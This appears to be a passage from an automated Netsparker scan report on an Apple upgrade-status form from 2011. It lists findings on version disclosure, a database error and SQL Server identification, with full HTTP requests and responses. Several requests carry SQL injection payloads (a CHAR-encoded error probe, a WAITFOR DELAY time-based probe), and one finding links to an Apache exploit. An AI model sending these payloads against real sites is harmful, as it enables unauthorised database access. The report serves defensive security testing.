<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=%27AND%201&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Incorrect syntax near the keyword 'AND'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. 
<a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'
email POST netsparker@example.com
submit POST   Check Status  

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 259
Expect: 100-continue
Accept-Encoding: gzip, deflate

company=3&firstname=Smith&lastname=Smith&zip='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 02:05:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4223
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1726


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=%27AND%201&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Incorrect syntax near the keyword 'AND'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. 
<a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Extracted Version

2.2.17

Request

GET /cgi-bin/upgrade_query/query.pl HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: wsidecar.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 5598
Keep-Alive: timeout=15, max=497
Connection: Keep-Alive
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 2013


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --><div id="container"><div id="header"> <h1>Status Inquiry</h1></div> <div id="main"><p>To check the status of your Mail or Fax upgrade, please complete the short form below. Information must be entered exactly as it was submitted on your order form.</p> <form method="post" action="http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl" onsubmit="return checkfields()"></div> <!-- eof top --> <label for="company"><strong>Select Program</strong></label> <p><SELECT NAME="promoid"> <OPTION VALUE = "Select Program" SELECTED>Select Program:</option> <OPTION VALUE = "iLife-thru10|19">iLife Up to Date</option> <OPTION VALUE = "iLife-from10|20">iLife Up to Date On or After 10/20</option> </SELECT></font></p><!--#ERR--> <hr size="1"> <div class="subcolumn1-2"> <label for="company"><strong>Company Name</strong> <span class="sosumi">(required)</span></label> <p><input name="company" type="text" size="30" maxlength="50" value="" class="required"></p> <p><strong>OR</strong></p> <label for="firstname"><strong>First Name</strong> <span class="sosumi">(required)</span></label> <p><input name="firstname" type="text" size="30" maxlength="30" value="" class="required"></p> <label for="lastname"><strong>Last Name</strong> <span class="sosumi">(required)</span></label> <p><input name="lastname" type="text" size="30" maxlength="30" value="" class="required"></p> </div> <div class="subcolumn2-2"> <label for="zip"><strong>Zip Code</strong> <span class="sosumi">(required)</span></label> <p><input name="zip" type="text" size="30" 
maxlength="11" value="" class="required"></p> <label for="phone"><strong>Email Address</strong></label> <p><input name="email" type="text" size="30" maxlength="50" value=""></p> </div> <div class="clearer">&nbsp;</div> <input type="submit" name="submit" value="&nbsp;&nbsp;Check Status&nbsp;&nbsp;" align="right"> <p class="sosumi">* Either company (if applicable) or customer name are required.</p> </form> <div class="clearer">&nbsp;</div></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities in the identified version. The attacker can also combine this information with other vulnerabilities in the application or the web server.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Extracted Version

PHP/5.3.4

Request

GET /cgi-bin/upgrade_query/query.pl HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: wsidecar.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 5598
Keep-Alive: timeout=15, max=497
Connection: Keep-Alive
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 2013


Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

Classification

OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
promoid POST response.write(268409241-22)'
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 3
email POST netsparker@example.com
submit POST   Check Status  

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 161
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid=response.write(268409241-22)%27&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:47 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4256
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1753


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=response%2Ewrite%28268409241%2D22%29%27&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Line 1: Incorrect syntax near '3'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. 
<a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
Microsoft SQL Server Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft SQL Server as its backend database. This issue is reported for information purposes only.

Impact

This issue is reported as additional information only. There is no direct impact arising from this issue.
/cgi-bin/upgrade_query/query.pl CONFIRMED

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 166
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid=%27;WAITFOR%20DELAY%20%270:0:25%27--&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:46 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4126
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%3BWAITFOR%20DELAY%20%270%3A0%3A25%27%2D%2D&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL">
<table width="430" border="0">

<tr>
<td width=400><font color=red><b>No records matched your search criteria.</b></font></td>
</tr>

</table>
<BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
Apache Version Is Out Of Date

1 TOTAL
INFORMATION
Netsparker identified that the target web server is running Apache and that the installed version is out of date. This was disclosed through the HTTP response.

Remedy

Please upgrade your installation of Apache to the latest stable version.

Remedy References

Known Vulnerabilities in this Version

Apache APR apr_fnmatch() Denial of Service Vulnerability

Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18 allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.

External References

CVE-2011-0419

Exploit

http://www.securityfocus.com/data/vulnerabilities/exploits/47820.txt

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Version

2.2.17

Request

GET /cgi-bin/upgrade_query/query.pl HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: wsidecar.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 5598
Keep-Alive: timeout=15, max=497
Connection: Keep-Alive
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 2013


